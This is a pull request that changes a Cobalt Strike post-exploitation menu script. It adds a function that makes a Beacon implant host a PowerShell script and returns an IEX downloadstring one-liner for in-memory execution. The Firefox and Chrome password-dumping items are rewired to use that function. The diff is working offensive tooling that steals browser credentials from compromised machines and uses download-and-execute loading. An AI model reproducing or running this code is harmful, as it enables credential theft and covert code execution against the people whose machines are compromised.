### PR TITLE
Convert get-firefoxpasswords & get-chromePasswords to use bhost_script()

### DIFF
--- a/postExploit/postExploit.cna
+++ b/postExploit/postExploit.cna
@@ -1,5 +1,34 @@
 # Adds menu driven support for some post exploit stuff
 
+import common.*;
+import beacon.*;
+
+
+# Arguments: beacon id, [code to host]
+sub bhost_script {
+	local('$port $builder');
+	$port = [CommonUtils randomPort];
+
+	# build up our command to send to Beacon
+	$builder = [new CommandBuilder];
+	[$builder setCommand: 0x3b];
+	[$builder addShort:   $port];
+	[$builder addString:  $2];
+
+	# task Beacon to run the above command.
+	call("beacons.task", $null, $1, cast([$builder build], 'b'));
+
+	# build and return our PowerShell one-liner
+	return "IEX ((new-object net.webclient).downloadstring('http://127.0.0.1: $+ $port $+ /'))";
+}
+
+
+# build the powershell artifact
+sub build_powershell_artifact {
+	$shellcode = artifact("$1", "powershell");
+	return $shellcode;
+}
+
 popup beacon_bottom{
 	menu "Post-Exploitation" {
 		menu "Enumeration" {
@@ -34,18 +63,30 @@ popup beacon_bottom{
 				local('$bid');
 				foreach $bid ($1){
 					binput($1, "powershell-import Get-FirefoxPasswords.ps1");
-					bpowershell_import($1, script_resource("scripts/Get-FirefoxPasswords.ps1"));
+					# read in the powershell script
+					$handle = openf(script_resource("scripts/Get-FirefoxPasswords.ps1"));
+					$firefox_script = readb($handle, -1);
+					closef($handle);
+					# host firefox script on beacon
+					$cmd = bhost_script($bid, $firefox_script);
 					binput($1, "powershell Get-FirefoxPasswords");
-					bpowershell($1, "Get-FirefoxPasswords");
+					# execute in-memory hosted script
+					bpowershell($1, "$cmd");
 				}
 			}
 			item "Get Chrome Passwords"{
 				local('$bid');
 				foreach $bid ($1){
 					binput($1, "powershell-import Get-ChromePasswords.ps1");
-					bpowershell_import($1, script_resource("scripts/Get-ChromePasswords.ps1"));
+					# read in the powershell script
+					$handle = openf(script_resource("scripts/Get-ChromePasswords.ps1"));
+					$chrome_script = readb($handle, -1);
+					closef($handle);
+					# host chrome script on beacon
+					$cmd = bhost_script($bid, $chrome_script);
 					binput($1, "powershell Get-ChromePasswords");
-					bpowershell($1, "Get-ChromePasswords");
+					# execute in-memory hosted script
+					bpowershell($1, "$cmd");
 				}
 			}
 		}


### PR DESCRIPTION
For more info, see #5.

This converts `get-firefoxpasswords.ps1` and `get-chromepasswords.ps1` to use the `bhost_script()` function.

Previously these scripts were to large to use the `powershell-import()` function. Now, these should properly execute.
